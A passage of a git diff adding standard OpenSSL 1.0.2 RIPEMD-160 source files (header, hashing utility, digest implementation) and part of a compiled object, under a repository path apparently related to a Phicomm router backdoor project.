+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_RIPEMD_H
+# define HEADER_RIPEMD_H
+
+# include <openssl/e_os2.h>
+# include <stddef.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifdef OPENSSL_NO_RIPEMD
+#  error RIPEMD is disabled.
+# endif
+
+# if defined(__LP32__)
+#  define RIPEMD160_LONG unsigned long
+# elif defined(OPENSSL_SYS_CRAY) || defined(__ILP64__)
+#  define RIPEMD160_LONG unsigned long
+#  define RIPEMD160_LONG_LOG2 3
+# else
+#  define RIPEMD160_LONG unsigned int
+# endif
+
+# define RIPEMD160_CBLOCK        64
+# define RIPEMD160_LBLOCK        (RIPEMD160_CBLOCK/4)
+# define RIPEMD160_DIGEST_LENGTH 20
+
+typedef struct RIPEMD160state_st {
+    RIPEMD160_LONG A, B, C, D, E;
+    RIPEMD160_LONG Nl, Nh;
+    RIPEMD160_LONG data[RIPEMD160_LBLOCK];
+    unsigned int num;
+} RIPEMD160_CTX;
+
+# ifdef OPENSSL_FIPS
+int private_RIPEMD160_Init(RIPEMD160_CTX *c);
+# endif
+int RIPEMD160_Init(RIPEMD160_CTX *c);
+int RIPEMD160_Update(RIPEMD160_CTX *c, const void *data, size_t len);
+int RIPEMD160_Final(unsigned char *md, RIPEMD160_CTX *c);
+unsigned char *RIPEMD160(const unsigned char *d, size_t n, unsigned char *md);
+void RIPEMD160_Transform(RIPEMD160_CTX *c, const unsigned char *b);
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd160.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd160.c
new file mode 100644
index 0000000..a4f8007
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd160.c
@@ -0,0 +1,121 @@
+/* crypto/ripemd/rmd160.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/ripemd.h>
+
+#define BUFSIZE 1024*16
+
+void do_fp(FILE *f);
+void pt(unsigned char *md);
+#if !defined(_OSD_POSIX) && !defined(__DJGPP__)
+int read(int, void *, unsigned int);
+#endif
+
+int main(int argc, char **argv)
+{
+    int i, err = 0;
+    FILE *IN;
+
+    if (argc == 1) {
+        do_fp(stdin);
+    } else {
+        for (i = 1; i < argc; i++) {
+            IN = fopen(argv[i], "r");
+            if (IN == NULL) {
+                perror(argv[i]);
+                err++;
+                continue;
+            }
+            printf("RIPEMD160(%s)= ", argv[i]);
+            do_fp(IN);
+            fclose(IN);
+        }
+    }
+    exit(err);
+}
+
+void do_fp(FILE *f)
+{
+    RIPEMD160_CTX c;
+    unsigned char md[RIPEMD160_DIGEST_LENGTH];
+    int fd;
+    int i;
+    static unsigned char buf[BUFSIZE];
+
+    fd = fileno(f);
+    RIPEMD160_Init(&c);
+    for (;;) {
+        i = read(fd, buf, BUFSIZE);
+        if (i <= 0)
+            break;
+        RIPEMD160_Update(&c, buf, (unsigned long)i);
+    }
+    RIPEMD160_Final(&(md[0]), &c);
+    pt(md);
+}
+
+void pt(unsigned char *md)
+{
+    int i;
+
+    for (i = 0; i < RIPEMD160_DIGEST_LENGTH; i++)
+        printf("%02x", md[i]);
+    printf("\n");
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_dgst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_dgst.c
new file mode 100644
index 0000000..4ddd939
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_dgst.c
@@ -0,0 +1,334 @@
+/* crypto/ripemd/rmd_dgst.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "rmd_locl.h"
+#include <openssl/opensslv.h>
+#include <openssl/crypto.h>
+
+const char RMD160_version[] = "RIPE-MD160" OPENSSL_VERSION_PTEXT;
+
+#ifdef RMD160_ASM
+void ripemd160_block_x86(RIPEMD160_CTX *c, unsigned long *p, size_t num);
+# define ripemd160_block ripemd160_block_x86
+#else
+void ripemd160_block(RIPEMD160_CTX *c, unsigned long *p, size_t num);
+#endif
+
+fips_md_init(RIPEMD160)
+{
+    memset(c, 0, sizeof(*c));
+    c->A = RIPEMD160_A;
+    c->B = RIPEMD160_B;
+    c->C = RIPEMD160_C;
+    c->D = RIPEMD160_D;
+    c->E = RIPEMD160_E;
+    return 1;
+}
+
+#ifndef ripemd160_block_data_order
+# ifdef X
+#  undef X
+# endif
+void ripemd160_block_data_order(RIPEMD160_CTX *ctx, const void *p, size_t num)
+{
+    const unsigned char *data = p;
+    register unsigned MD32_REG_T A, B, C, D, E;
+    unsigned MD32_REG_T a, b, c, d, e, l;
+# ifndef MD32_XARRAY
+    /* See comment in crypto/sha/sha_locl.h for details. */
+    unsigned MD32_REG_T XX0, XX1, XX2, XX3, XX4, XX5, XX6, XX7,
+        XX8, XX9, XX10, XX11, XX12, XX13, XX14, XX15;
+#  define X(i)   XX##i
+# else
+    RIPEMD160_LONG XX[16];
+#  define X(i)   XX[i]
+# endif
+
+    for (; num--;) {
+
+        A = ctx->A;
+        B = ctx->B;
+        C = ctx->C;
+        D = ctx->D;
+        E = ctx->E;
+
+        (void)HOST_c2l(data, l);
+        X(0) = l;
+        (void)HOST_c2l(data, l);
+        X(1) = l;
+        RIP1(A, B, C, D, E, WL00, SL00);
+        (void)HOST_c2l(data, l);
+        X(2) = l;
+        RIP1(E, A, B, C, D, WL01, SL01);
+        (void)HOST_c2l(data, l);
+        X(3) = l;
+        RIP1(D, E, A, B, C, WL02, SL02);
+        (void)HOST_c2l(data, l);
+        X(4) = l;
+        RIP1(C, D, E, A, B, WL03, SL03);
+        (void)HOST_c2l(data, l);
+        X(5) = l;
+        RIP1(B, C, D, E, A, WL04, SL04);
+        (void)HOST_c2l(data, l);
+        X(6) = l;
+        RIP1(A, B, C, D, E, WL05, SL05);
+        (void)HOST_c2l(data, l);
+        X(7) = l;
+        RIP1(E, A, B, C, D, WL06, SL06);
+        (void)HOST_c2l(data, l);
+        X(8) = l;
+        RIP1(D, E, A, B, C, WL07, SL07);
+        (void)HOST_c2l(data, l);
+        X(9) = l;
+        RIP1(C, D, E, A, B, WL08, SL08);
+        (void)HOST_c2l(data, l);
+        X(10) = l;
+        RIP1(B, C, D, E, A, WL09, SL09);
+        (void)HOST_c2l(data, l);
+        X(11) = l;
+        RIP1(A, B, C, D, E, WL10, SL10);
+        (void)HOST_c2l(data, l);
+        X(12) = l;
+        RIP1(E, A, B, C, D, WL11, SL11);
+        (void)HOST_c2l(data, l);
+        X(13) = l;
+        RIP1(D, E, A, B, C, WL12, SL12);
+        (void)HOST_c2l(data, l);
+        X(14) = l;
+        RIP1(C, D, E, A, B, WL13, SL13);
+        (void)HOST_c2l(data, l);
+        X(15) = l;
+        RIP1(B, C, D, E, A, WL14, SL14);
+        RIP1(A, B, C, D, E, WL15, SL15);
+
+        RIP2(E, A, B, C, D, WL16, SL16, KL1);
+        RIP2(D, E, A, B, C, WL17, SL17, KL1);
+        RIP2(C, D, E, A, B, WL18, SL18, KL1);
+        RIP2(B, C, D, E, A, WL19, SL19, KL1);
+        RIP2(A, B, C, D, E, WL20, SL20, KL1);
+        RIP2(E, A, B, C, D, WL21, SL21, KL1);
+        RIP2(D, E, A, B, C, WL22, SL22, KL1);
+        RIP2(C, D, E, A, B, WL23, SL23, KL1);
+        RIP2(B, C, D, E, A, WL24, SL24, KL1);
+        RIP2(A, B, C, D, E, WL25, SL25, KL1);
+        RIP2(E, A, B, C, D, WL26, SL26, KL1);
+        RIP2(D, E, A, B, C, WL27, SL27, KL1);
+        RIP2(C, D, E, A, B, WL28, SL28, KL1);
+        RIP2(B, C, D, E, A, WL29, SL29, KL1);
+        RIP2(A, B, C, D, E, WL30, SL30, KL1);
+        RIP2(E, A, B, C, D, WL31, SL31, KL1);
+
+        RIP3(D, E, A, B, C, WL32, SL32, KL2);
+        RIP3(C, D, E, A, B, WL33, SL33, KL2);
+        RIP3(B, C, D, E, A, WL34, SL34, KL2);
+        RIP3(A, B, C, D, E, WL35, SL35, KL2);
+        RIP3(E, A, B, C, D, WL36, SL36, KL2);
+        RIP3(D, E, A, B, C, WL37, SL37, KL2);
+        RIP3(C, D, E, A, B, WL38, SL38, KL2);
+        RIP3(B, C, D, E, A, WL39, SL39, KL2);
+        RIP3(A, B, C, D, E, WL40, SL40, KL2);
+        RIP3(E, A, B, C, D, WL41, SL41, KL2);
+        RIP3(D, E, A, B, C, WL42, SL42, KL2);
+        RIP3(C, D, E, A, B, WL43, SL43, KL2);
+        RIP3(B, C, D, E, A, WL44, SL44, KL2);
+        RIP3(A, B, C, D, E, WL45, SL45, KL2);
+        RIP3(E, A, B, C, D, WL46, SL46, KL2);
+        RIP3(D, E, A, B, C, WL47, SL47, KL2);
+
+        RIP4(C, D, E, A, B, WL48, SL48, KL3);
+        RIP4(B, C, D, E, A, WL49, SL49, KL3);
+        RIP4(A, B, C, D, E, WL50, SL50, KL3);
+        RIP4(E, A, B, C, D, WL51, SL51, KL3);
+        RIP4(D, E, A, B, C, WL52, SL52, KL3);
+        RIP4(C, D, E, A, B, WL53, SL53, KL3);
+        RIP4(B, C, D, E, A, WL54, SL54, KL3);
+        RIP4(A, B, C, D, E, WL55, SL55, KL3);
+        RIP4(E, A, B, C, D, WL56, SL56, KL3);
+        RIP4(D, E, A, B, C, WL57, SL57, KL3);
+        RIP4(C, D, E, A, B, WL58, SL58, KL3);
+        RIP4(B, C, D, E, A, WL59, SL59, KL3);
+        RIP4(A, B, C, D, E, WL60, SL60, KL3);
+        RIP4(E, A, B, C, D, WL61, SL61, KL3);
+        RIP4(D, E, A, B, C, WL62, SL62, KL3);
+        RIP4(C, D, E, A, B, WL63, SL63, KL3);
+
+        RIP5(B, C, D, E, A, WL64, SL64, KL4);
+        RIP5(A, B, C, D, E, WL65, SL65, KL4);
+        RIP5(E, A, B, C, D, WL66, SL66, KL4);
+        RIP5(D, E, A, B, C, WL67, SL67, KL4);
+        RIP5(C, D, E, A, B, WL68, SL68, KL4);
+        RIP5(B, C, D, E, A, WL69, SL69, KL4);
+        RIP5(A, B, C, D, E, WL70, SL70, KL4);
+        RIP5(E, A, B, C, D, WL71, SL71, KL4);
+        RIP5(D, E, A, B, C, WL72, SL72, KL4);
+        RIP5(C, D, E, A, B, WL73, SL73, KL4);
+        RIP5(B, C, D, E, A, WL74, SL74, KL4);
+        RIP5(A, B, C, D, E, WL75, SL75, KL4);
+        RIP5(E, A, B, C, D, WL76, SL76, KL4);
+        RIP5(D, E, A, B, C, WL77, SL77, KL4);
+        RIP5(C, D, E, A, B, WL78, SL78, KL4);
+        RIP5(B, C, D, E, A, WL79, SL79, KL4);
+
+        a = A;
+        b = B;
+        c = C;
+        d = D;
+        e = E;
+        /* Do other half */
+        A = ctx->A;
+        B = ctx->B;
+        C = ctx->C;
+        D = ctx->D;
+        E = ctx->E;
+
+        RIP5(A, B, C, D, E, WR00, SR00, KR0);
+        RIP5(E, A, B, C, D, WR01, SR01, KR0);
+        RIP5(D, E, A, B, C, WR02, SR02, KR0);
+        RIP5(C, D, E, A, B, WR03, SR03, KR0);
+        RIP5(B, C, D, E, A, WR04, SR04, KR0);
+        RIP5(A, B, C, D, E, WR05, SR05, KR0);
+        RIP5(E, A, B, C, D, WR06, SR06, KR0);
+        RIP5(D, E, A, B, C, WR07, SR07, KR0);
+        RIP5(C, D, E, A, B, WR08, SR08, KR0);
+        RIP5(B, C, D, E, A, WR09, SR09, KR0);
+        RIP5(A, B, C, D, E, WR10, SR10, KR0);
+        RIP5(E, A, B, C, D, WR11, SR11, KR0);
+        RIP5(D, E, A, B, C, WR12, SR12, KR0);
+        RIP5(C, D, E, A, B, WR13, SR13, KR0);
+        RIP5(B, C, D, E, A, WR14, SR14, KR0);
+        RIP5(A, B, C, D, E, WR15, SR15, KR0);
+
+        RIP4(E, A, B, C, D, WR16, SR16, KR1);
+        RIP4(D, E, A, B, C, WR17, SR17, KR1);
+        RIP4(C, D, E, A, B, WR18, SR18, KR1);
+        RIP4(B, C, D, E, A, WR19, SR19, KR1);
+        RIP4(A, B, C, D, E, WR20, SR20, KR1);
+        RIP4(E, A, B, C, D, WR21, SR21, KR1);
+        RIP4(D, E, A, B, C, WR22, SR22, KR1);
+        RIP4(C, D, E, A, B, WR23, SR23, KR1);
+        RIP4(B, C, D, E, A, WR24, SR24, KR1);
+        RIP4(A, B, C, D, E, WR25, SR25, KR1);
+        RIP4(E, A, B, C, D, WR26, SR26, KR1);
+        RIP4(D, E, A, B, C, WR27, SR27, KR1);
+        RIP4(C, D, E, A, B, WR28, SR28, KR1);
+        RIP4(B, C, D, E, A, WR29, SR29, KR1);
+        RIP4(A, B, C, D, E, WR30, SR30, KR1);
+        RIP4(E, A, B, C, D, WR31, SR31, KR1);
+
+        RIP3(D, E, A, B, C, WR32, SR32, KR2);
+        RIP3(C, D, E, A, B, WR33, SR33, KR2);
+        RIP3(B, C, D, E, A, WR34, SR34, KR2);
+        RIP3(A, B, C, D, E, WR35, SR35, KR2);
+        RIP3(E, A, B, C, D, WR36, SR36, KR2);
+        RIP3(D, E, A, B, C, WR37, SR37, KR2);
+        RIP3(C, D, E, A, B, WR38, SR38, KR2);
+        RIP3(B, C, D, E, A, WR39, SR39, KR2);
+        RIP3(A, B, C, D, E, WR40, SR40, KR2);
+        RIP3(E, A, B, C, D, WR41, SR41, KR2);
+        RIP3(D, E, A, B, C, WR42, SR42, KR2);
+        RIP3(C, D, E, A, B, WR43, SR43, KR2);
+        RIP3(B, C, D, E, A, WR44, SR44, KR2);
+        RIP3(A, B, C, D, E, WR45, SR45, KR2);
+        RIP3(E, A, B, C, D, WR46, SR46, KR2);
+        RIP3(D, E, A, B, C, WR47, SR47, KR2);
+
+        RIP2(C, D, E, A, B, WR48, SR48, KR3);
+        RIP2(B, C, D, E, A, WR49, SR49, KR3);
+        RIP2(A, B, C, D, E, WR50, SR50, KR3);
+        RIP2(E, A, B, C, D, WR51, SR51, KR3);
+        RIP2(D, E, A, B, C, WR52, SR52, KR3);
+        RIP2(C, D, E, A, B, WR53, SR53, KR3);
+        RIP2(B, C, D, E, A, WR54, SR54, KR3);
+        RIP2(A, B, C, D, E, WR55, SR55, KR3);
+        RIP2(E, A, B, C, D, WR56, SR56, KR3);
+        RIP2(D, E, A, B, C, WR57, SR57, KR3);
+        RIP2(C, D, E, A, B, WR58, SR58, KR3);
+        RIP2(B, C, D, E, A, WR59, SR59, KR3);
+        RIP2(A, B, C, D, E, WR60, SR60, KR3);
+        RIP2(E, A, B, C, D, WR61, SR61, KR3);
+        RIP2(D, E, A, B, C, WR62, SR62, KR3);
+        RIP2(C, D, E, A, B, WR63, SR63, KR3);
+
+        RIP1(B, C, D, E, A, WR64, SR64);
+        RIP1(A, B, C, D, E, WR65, SR65);
+        RIP1(E, A, B, C, D, WR66, SR66);
+        RIP1(D, E, A, B, C, WR67, SR67);
+        RIP1(C, D, E, A, B, WR68, SR68);
+        RIP1(B, C, D, E, A, WR69, SR69);
+        RIP1(A, B, C, D, E, WR70, SR70);
+        RIP1(E, A, B, C, D, WR71, SR71);
+        RIP1(D, E, A, B, C, WR72, SR72);
+        RIP1(C, D, E, A, B, WR73, SR73);
+        RIP1(B, C, D, E, A, WR74, SR74);
+        RIP1(A, B, C, D, E, WR75, SR75);
+        RIP1(E, A, B, C, D, WR76, SR76);
+        RIP1(D, E, A, B, C, WR77, SR77);
+        RIP1(C, D, E, A, B, WR78, SR78);
+        RIP1(B, C, D, E, A, WR79, SR79);
+
+        D = ctx->B + c + D;
+        ctx->B = ctx->C + d + E;
+        ctx->C = ctx->D + e + A;
+        ctx->D = ctx->E + a + B;
+        ctx->E = ctx->A + b + C;
+        ctx->A = D;
+
+    }
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_dgst.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_dgst.o
new file mode 100644
index 0000000000000000000000000000000000000000..80cc4038e11d292c19314cd2e233f2d420308ed2
GIT binary patch
literal 7864
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
